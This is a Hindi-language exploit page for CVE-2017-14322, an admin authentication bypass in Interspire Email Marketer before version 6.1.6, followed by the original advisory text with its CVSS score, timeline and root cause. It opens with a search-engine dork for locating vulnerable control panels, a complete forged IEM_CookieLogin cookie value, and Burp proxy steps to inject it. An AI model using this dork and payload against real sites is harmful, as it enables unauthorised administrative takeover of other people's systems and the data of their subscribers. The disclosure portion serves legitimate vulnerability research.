
CVE-2017-14322 Interspire Email Marketer (emailmarketer) एक्सप्लॉइट
intitle:"Control Panel" + emailmarketer
अनुरोध हेडर के लिए मैच और रिप्लेस निम्नानुसार जोड़ें:
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
जब आप साइट खोलते हैं, तो पहली बार यह काम नहीं करेगा क्योंकि कुकी हेडर मौजूद नहीं है। उपरोक्त नियम जोड़ने के साथ बर्प प्रॉक्सी का उपयोग करके साइट को दूसरी बार रीफ्रेश करें, आप वही देखेंगे जो आप चाहते थे। "Intercept Client Requests" पर टिक करना सुनिश्चित करें।
Interspire Email Marketer - रिमोट एडमिन प्रमाणीकरण बाईपास
Hakan Küsne, Infoteam Security (CH)
CVE-2017-14322
CVSS आधार स्कोर: 9.8 CVSS वेक्टर: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O
2017-09-12 भेद्यता खोजी गई 2017-09-12 पता चला कि विक्रेता ने इसे पहले ही ठीक कर दिया था लेकिन ग्राहकों को कभी सूचित नहीं किया, जिससे सैकड़ों वास्तविक दुनिया में असुरक्षित रह गए 2017-10-17 सार्वजनिक खुलासा
Interspire Email Marketer संस्करण 6.1.6 से पहले
http://www.interspire.com/emailmarketer/
यह जाँचने के लिए जिम्मेदार फ़ंक्शन कि उपयोगकर्ता पहले से लॉग इन है या नहीं, Interspire Email Marketer (IEM) संस्करण 6.1.6 से पहले init.php में, रिमोट हमलावरों को प्रमाणीकरण बाईपास करने और विशेष रूप से तैयार किए गए मान के साथ IEM_CookieLogin कुकी का उपयोग करके प्रशासनिक पहुंच प्राप्त करने की अनुमति देता है। इसके अलावा, यदि ग्राहक के पास वार्षिक रखरखाव योजना नहीं है, तो एप्लिकेशन कहता है कि यह अंतिम उपलब्ध संस्करण पर है और कोई अपडेट नहीं है।
ये भेद्यताएँ एप्लिकेशन के एक समझौता किए गए उदाहरण पर घटना प्रतिक्रिया के दौरान पाई गईं।
विवरण यहाँ प्रदान किए गए हैं: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
विक्रेता ने संस्करण 6.1.6 में भेद्यता को ठीक कर दिया है, लेकिन इसके बारे में अपने ग्राहकों को विशेष रूप से कभी सूचित नहीं किया।
यह शोषण केवल शैक्षिक उद्देश्य के लिए है और आपके अपने कार्यों के लिए जिम्मेदार नहीं है।